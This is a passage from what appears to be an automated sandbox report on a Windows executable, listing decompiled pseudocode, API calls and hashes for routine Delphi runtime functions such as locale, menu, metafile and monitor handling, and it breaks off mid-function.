                                                                        0x0040afeb
                                                                        0x0040affa
                                                                        0x0040b007
                                                                        0x0040b01c
                                                                        0x0040b02b
                                                                        0x0040b040
                                                                        0x0040b04f
                                                                        0x0040b062
                                                                        0x0040b075
                                                                        0x0040b08a
                                                                        0x0040b099
                                                                        0x0040b0ac
                                                                        0x0040b0c1
                                                                        0x0040b0cc
                                                                        0x0040b0d9
                                                                        0x0040b0ee
                                                                        0x0040b0f9
                                                                        0x0040b106
                                                                        0x0040b119
                                                                        0x0040b12e
                                                                        0x0040b13b
                                                                        0x0040b150
                                                                        0x0040b15d
                                                                        0x0040b165
                                                                        0x0040b16d
                                                                        0x0040b182
                                                                        0x0040b18c
                                                                        0x0040b191
                                                                        0x0040b193
                                                                        0x0040b1ac
                                                                        0x0040b195
                                                                        0x0040b19d
                                                                        0x0040b19d
                                                                        0x0040b1c1
                                                                        0x0040b1cb
                                                                        0x0040b1d0
                                                                        0x0040b1d2
                                                                        0x0040b1e4
                                                                        0x0040b1f5
                                                                        0x0040b20e
                                                                        0x0040b1f7
                                                                        0x0040b1ff
                                                                        0x0040b1ff
                                                                        0x0040b1f5
                                                                        0x0040b213
                                                                        0x0040b216
                                                                        0x0040b219
                                                                        0x0040b21e
                                                                        0x0040b22b
                                                                        0x0040b230
                                                                        0x0040b233
                                                                        0x0040b236
                                                                        0x0040b23b
                                                                        0x0040b248
                                                                        0x0040b25b
                                                                        0x0040b262
                                                                        0x0040b265
                                                                        0x0040b268
                                                                        0x0040b27a

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000000,0040B27B,?,?,00000000,00000000), ref: 0040AFE6
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                        • API String ID: 4232894706-2493093252
                                                                        • Opcode ID: 57064a61c693a148e843b2285f5530ec02f9961804421419e221219622123def
                                                                        • Instruction ID: ab645d97e84e0256c4c4970a1fb5dcc84b1706c9c56c8f89f877431b82433d7f
                                                                        • Opcode Fuzzy Hash: 57064a61c693a148e843b2285f5530ec02f9961804421419e221219622123def
                                                                        • Instruction Fuzzy Hash: 28613A707001489BDB04EBE9E881A9F77A6DB98308F20947FA501BB3D6DA3CDD05879C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00446428, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 187windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E00446428(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x446683);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x44668a);
					E00404348( &_v68);
					return E00404348( &_v12);
				}
				E004043E0( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E00448264(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x47aa7c + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x4466a8) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0047AA70 |  *0x0047AA60 |  *0x0047AA68 | 0x00000400;
							_t103 = E00448264(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047F8(_v12));
							} else {
								_t109 = E004047F8( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044692C(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E00448820(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00447E3C(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x47aab0 + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x4466a8) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0047AAA8 |  *0x0047AA84 |  *0x0047AAB8 |  *0x0047AAC0;
							_v61.fState =  *0x0047AA90 |  *0x0047AAA0 |  *0x0047AA98;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E004047F8(_v12);
							if(E00448264(_t154) > 0) {
								_v61.hSubMenu = E0044692C(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x44669c);
						E00445A8C( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E004046C0();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x44531c; // 0x445368
					_t149 = E00403768( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0044692C(_t154);
				goto L8;
			}





















                                                                        0x00446428
                                                                        0x00446433
                                                                        0x00446436
                                                                        0x00446439
                                                                        0x0044643c
                                                                        0x0044643e
                                                                        0x00446442
                                                                        0x00446443
                                                                        0x00446448
                                                                        0x0044644b
                                                                        0x00446452
                                                                        0x00446665
                                                                        0x00446667
                                                                        0x0044666a
                                                                        0x0044666d
                                                                        0x00446675
                                                                        0x00446682
                                                                        0x00446682
                                                                        0x0044645e
                                                                        0x0044646c
                                                                        0x0044647a
                                                                        0x0044647f
                                                                        0x004464c4
                                                                        0x004464d2
                                                                        0x0044661e
                                                                        0x00446626
                                                                        0x0044662b
                                                                        0x0044662d
                                                                        0x00446660
                                                                        0x0044662f
                                                                        0x00446632
                                                                        0x00446647
                                                                        0x00446647
                                                                        0x00000000
                                                                        0x0044662d
                                                                        0x004464d8
                                                                        0x004464df
                                                                        0x004464ed
                                                                        0x004464f1
                                                                        0x00446508
                                                                        0x00446516
                                                                        0x00446516
                                                                        0x00000000
                                                                        0x00446516
                                                                        0x00446512
                                                                        0x00446514
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044651a
                                                                        0x0044651a
                                                                        0x0044651a
                                                                        0x0044651c
                                                                        0x0044651c
                                                                        0x0044656b
                                                                        0x00446592
                                                                        0x00446599
                                                                        0x0044659e
                                                                        0x004465a3
                                                                        0x004465a8
                                                                        0x004465b3
                                                                        0x004465bf
                                                                        0x004465c8
                                                                        0x004465c8
                                                                        0x004465d4
                                                                        0x00000000
                                                                        0x004465d4
                                                                        0x004464f1
                                                                        0x00446481
                                                                        0x00446484
                                                                        0x00446486
                                                                        0x004464a0
                                                                        0x004464a0
                                                                        0x004464a3
                                                                        0x004464af
                                                                        0x004464b4
                                                                        0x004464bf
                                                                        0x00000000
                                                                        0x004464bf
                                                                        0x00446488
                                                                        0x0044648c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00446491
                                                                        0x00446497
                                                                        0x0044649c
                                                                        0x0044649e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044649e
                                                                        0x00446475
                                                                        0x00000000

                                                                        APIs
                                                                        • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 004465D4
                                                                        • GetVersion.KERNEL32(00000000,00446683), ref: 004464C4
                                                                          • Part of subcall function 0044692C: CreatePopupMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446947
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$CreateInsertItemPopupVersion
                                                                        • String ID: ,$?$hSD
                                                                        • API String ID: 133695497-2744044814
                                                                        • Opcode ID: c33b320a3809bf8af9b9c0040c7416c45296dc4a54403c922eabdd25c516cfcc
                                                                        • Instruction ID: c1f226bee94c505ff5879a5e45d3f70f72b48b4718122b33157cbbefa9e75370
                                                                        • Opcode Fuzzy Hash: c33b320a3809bf8af9b9c0040c7416c45296dc4a54403c922eabdd25c516cfcc
                                                                        • Instruction Fuzzy Hash: BD611370A002409BEB10EF79DC816AE7BF5BF4A308F06457AE944E7396D738D845CB5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00456720, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetActiveWindow.USER32 ref: 00456733
                                                                        • GetWindowRect.USER32 ref: 0045678D
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004567C5
                                                                        • MessageBoxA.USER32 ref: 00456806
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045687C,?,00000000,00456875), ref: 00456856
                                                                        • SetActiveWindow.USER32(?,0045687C,?,00000000,00456875), ref: 00456867
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Active$MessageRect
                                                                        • String ID: (
                                                                        • API String ID: 3147912190-3887548279
                                                                        • Opcode ID: 3547273055f9fab4712ace14ffcd2524f14b860b50c39c87bf408079b6818cc4
                                                                        • Instruction ID: 7cbad7be9c4b48523c1cfc1a11d04e08d9ad09d2673b50e57f39b10a150b3f7a
                                                                        • Opcode Fuzzy Hash: 3547273055f9fab4712ace14ffcd2524f14b860b50c39c87bf408079b6818cc4
                                                                        • Instruction Fuzzy Hash: BE415EB5E00104AFDB04DFA9CD81FAE77F9EB48304F55446AF900EB392DA74AD008B54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00422CEA, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E00422CEA(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E00422B88(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421870( &_v38) != _v18) {
					E00420A20();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00402754(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e5b, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00420A20();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00420A20();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00422E62);
				return E00402774(_v16);
			}


























                                                                        0x00422ced
                                                                        0x00422cef
                                                                        0x00422cf8
                                                                        0x00422cfb
                                                                        0x00422cfe
                                                                        0x00422d02
                                                                        0x00422d14
                                                                        0x00422d1e
                                                                        0x00422d2e
                                                                        0x00422d2e
                                                                        0x00422d33
                                                                        0x00422d3f
                                                                        0x00422d42
                                                                        0x00422d50
                                                                        0x00422d5e
                                                                        0x00422d68
                                                                        0x00422d71
                                                                        0x00422d73
                                                                        0x00422d73
                                                                        0x00422d93
                                                                        0x00422db0
                                                                        0x00422db3
                                                                        0x00422dbc
                                                                        0x00422dc1
                                                                        0x00422dc6
                                                                        0x00422ddc
                                                                        0x00422dde
                                                                        0x00422de3
                                                                        0x00422de5
                                                                        0x00422de5
                                                                        0x00422df7
                                                                        0x00422dfc
                                                                        0x00422e06
                                                                        0x00422e0c
                                                                        0x00422e11
                                                                        0x00422e18
                                                                        0x00422e30
                                                                        0x00422e32
                                                                        0x00422e37
                                                                        0x00422e39
                                                                        0x00422e39
                                                                        0x00422e3e
                                                                        0x00422e44
                                                                        0x00422e47
                                                                        0x00422e4a
                                                                        0x00422e5a

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D8E
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422DAB
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DD7
                                                                        • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DF7
                                                                        • DeleteEnhMetaFile.GDI32(00000016), ref: 00422E18
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422E2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileMeta$Bits$DeleteHeader
                                                                        • String ID: `
                                                                        • API String ID: 1990453761-2679148245
                                                                        • Opcode ID: 3a1adc593a487124711b27ce84d4190b2dfc95728f08b01ed21f342c1ee5f22a
                                                                        • Instruction ID: fb0f5a08ef807ff7da08fe929f8a7a8f4baacde4112ddcaebb4220c4adbca4e0
                                                                        • Opcode Fuzzy Hash: 3a1adc593a487124711b27ce84d4190b2dfc95728f08b01ed21f342c1ee5f22a
                                                                        • Instruction Fuzzy Hash: CC412F75E00218AFDB00DFA9D985AAEB7F9EF48710F51846AF404FB241D7789D40CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00422CEC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E00422CEC(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E00422B88(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421870( &_v38) != _v18) {
					E00420A20();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00402754(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e5b, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00420A20();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00420A20();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00422E62);
				return E00402774(_v16);
			}


























                                                                        0x00422ced
                                                                        0x00422cef
                                                                        0x00422cf8
                                                                        0x00422cfb
                                                                        0x00422cfe
                                                                        0x00422d02
                                                                        0x00422d14
                                                                        0x00422d1e
                                                                        0x00422d2e
                                                                        0x00422d2e
                                                                        0x00422d33
                                                                        0x00422d3f
                                                                        0x00422d42
                                                                        0x00422d50
                                                                        0x00422d5e
                                                                        0x00422d68
                                                                        0x00422d71
                                                                        0x00422d73
                                                                        0x00422d73
                                                                        0x00422d93
                                                                        0x00422db0
                                                                        0x00422db3
                                                                        0x00422dbc
                                                                        0x00422dc1
                                                                        0x00422dc6
                                                                        0x00422ddc
                                                                        0x00422dde
                                                                        0x00422de3
                                                                        0x00422de5
                                                                        0x00422de5
                                                                        0x00422df7
                                                                        0x00422dfc
                                                                        0x00422e06
                                                                        0x00422e0c
                                                                        0x00422e11
                                                                        0x00422e18
                                                                        0x00422e30
                                                                        0x00422e32
                                                                        0x00422e37
                                                                        0x00422e39
                                                                        0x00422e39
                                                                        0x00422e3e
                                                                        0x00422e44
                                                                        0x00422e47
                                                                        0x00422e4a
                                                                        0x00422e5a

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D8E
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422DAB
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DD7
                                                                        • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DF7
                                                                        • DeleteEnhMetaFile.GDI32(00000016), ref: 00422E18
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422E2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileMeta$Bits$DeleteHeader
                                                                        • String ID: `
                                                                        • API String ID: 1990453761-2679148245
                                                                        • Opcode ID: ec978911b333c8a9dc1ac6c849a624436fee95648c6e243f4a88b920bed035bd
                                                                        • Instruction ID: 01aed2916d9461752607c608983ec61ef17ba308f3f8825e499b2a2baebaa4d3
                                                                        • Opcode Fuzzy Hash: ec978911b333c8a9dc1ac6c849a624436fee95648c6e243f4a88b920bed035bd
                                                                        • Instruction Fuzzy Hash: DF412E75E00218AFDB00DFA9D985AAEB7F9EF48710F51846AF404FB241D7789D40CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00427548, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E00427548(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x496ac8 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					 *0x496aac = E00427218(4, _t23,  *0x496aac, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                                                        0x00427551
                                                                        0x00427554
                                                                        0x0042755e
                                                                        0x00427583
                                                                        0x0042758b
                                                                        0x004275ab
                                                                        0x004275b0
                                                                        0x004275bb
                                                                        0x004275c6
                                                                        0x004275d0
                                                                        0x004275d1
                                                                        0x004275d2
                                                                        0x004275d3
                                                                        0x004275d4
                                                                        0x004275d5
                                                                        0x004275df
                                                                        0x004275e1
                                                                        0x004275e9
                                                                        0x004275ea
                                                                        0x004275ea
                                                                        0x004275ef
                                                                        0x004275ef
                                                                        0x00427560
                                                                        0x00427572
                                                                        0x0042757f
                                                                        0x0042757f
                                                                        0x004275f9

                                                                        APIs
                                                                        • GetMonitorInfoA.USER32(?,?), ref: 00427579
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004275A0
                                                                        • GetSystemMetrics.USER32 ref: 004275B5
                                                                        • GetSystemMetrics.USER32 ref: 004275C0
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 004275EA
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfo
                                                                        • API String ID: 1539801207-1633989206
                                                                        • Opcode ID: 1644f9ef54712b8acc15ff1c2dbde6ccff60e967c01c1c93aa83ca6663675b5d
                                                                        • Instruction ID: 6783ea58f697a8443343b13a6c264d2348319dbac4baab090155d0615a0f433e
                                                                        • Opcode Fuzzy Hash: 1644f9ef54712b8acc15ff1c2dbde6ccff60e967c01c1c93aa83ca6663675b5d
                                                                        • Instruction Fuzzy Hash: 0A1106727047116FD720CF65AC447A7F7A9EB17320F50853BFC06A7A40D7B9A8408BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401B64, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E00401B64() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4965bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push("�1!");
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x496049 != 0) {
						_push(0x4965c4);
						L004013FC();
					}
					 *0x4965bc = 0;
					_t3 =  *0x49661c; // 0x69cc50
					LocalFree(_t3);
					 *0x49661c = 0;
					_t19 =  *0x4965e4; // 0x69c334
					while(_t19 != 0x4965e4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401464(0x4965e4);
					E00401464(0x4965f4);
					E00401464(0x496620);
					_t14 =  *0x4965dc; // 0x69bd00
					while(_t14 != 0) {
						 *0x4965dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4965dc; // 0x69bd00
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c41);
					if( *0x496049 != 0) {
						_push(0x4965c4);
